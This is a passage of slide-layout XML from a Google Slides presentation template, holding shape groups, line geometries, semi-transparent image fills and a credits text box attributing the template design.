                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Google Shape;78;p4"/>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79" name="Google Shape;79;p4"/>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80" name="Google Shape;80;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="81" name="Google Shape;81;p4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="Google Shape;82;p4"/>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4"/>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4"/>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4"/>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 name="Google Shape;86;p4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="87" name="Google Shape;87;p4"/>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4"/>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4"/>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4"/>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1" name="Google Shape;91;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92" name="Google Shape;92;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1020751"/>
            <a:ext cx="7704000" cy="390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93" name="Google Shape;93;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Google Shape;94;p4"/>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4"/>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4"/>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4"/>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4"/>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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8690726" y="3286064"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Google Shape;100;p4"/>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4"/>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4"/>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4"/>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4"/>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 name="Google Shape;105;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2578675"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="2578675"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="Google Shape;106;p4"/>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07" name="Google Shape;107;p4"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>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13" name="Shape 813"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="814" name="Google Shape;814;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="815" name="Google Shape;815;p31"/>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816" name="Google Shape;816;p31"/>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817" name="Google Shape;817;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="4442730"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="818" name="Google Shape;818;p31"/>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31"/>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31"/>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31"/>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2" name="Google Shape;822;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8730053" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="823" name="Google Shape;823;p31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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6" name="Google Shape;836;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044690" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="837" name="Google Shape;837;p31"/>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31"/>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31"/>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31"/>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41" name="Google Shape;841;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347950" y="707777"/>
            <a:ext cx="4448100" cy="122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60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842" name="Google Shape;842;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347900" y="1841450"/>
            <a:ext cx="4448100" cy="11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3" name="Google Shape;843;p31"/>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lbert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>CREDITS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t> This presentation template was created by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solid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and includes icons by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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and infographics &amp; images by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200" u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="844" name="Google Shape;844;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="845" name="Google Shape;845;p31"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="846" name="Google Shape;846;p31"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>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47" name="Shape 847"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="848" name="Google Shape;848;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849" name="Google Shape;849;p32"/>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850" name="Google Shape;850;p32"/>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851" name="Google Shape;851;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="223258" y="1854600"/>
            <a:ext cx="2475898" cy="3086910"/>
            <a:chOff x="223258" y="1854600"/>
            <a:chExt cx="2475898" cy="3086910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="852" name="Google Shape;852;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="853" name="Google Shape;853;p32"/>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32"/>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32"/>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32"/>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7" name="Google Shape;857;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000">
              <a:off x="-182085" y="2259943"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="858" name="Google Shape;858;p32"/>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32"/>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32"/>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32"/>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62" name="Google Shape;862;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="863" name="Google Shape;863;p32"/>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32"/>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32"/>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32"/>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32"/>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868" name="Google Shape;868;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="37000"/>
          </a:blip>
          <a:srcRect b="35662" l="0" r="38279" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-75050" y="2503675"/>
            <a:ext cx="2714875" cy="256477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69" name="Shape 869"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="870" name="Google Shape;870;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="37000"/>
          </a:blip>
          <a:srcRect b="35662" l="0" r="38279" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="-75050" y="73364"/>
            <a:ext cx="2714875" cy="2564774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="871" name="Google Shape;871;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
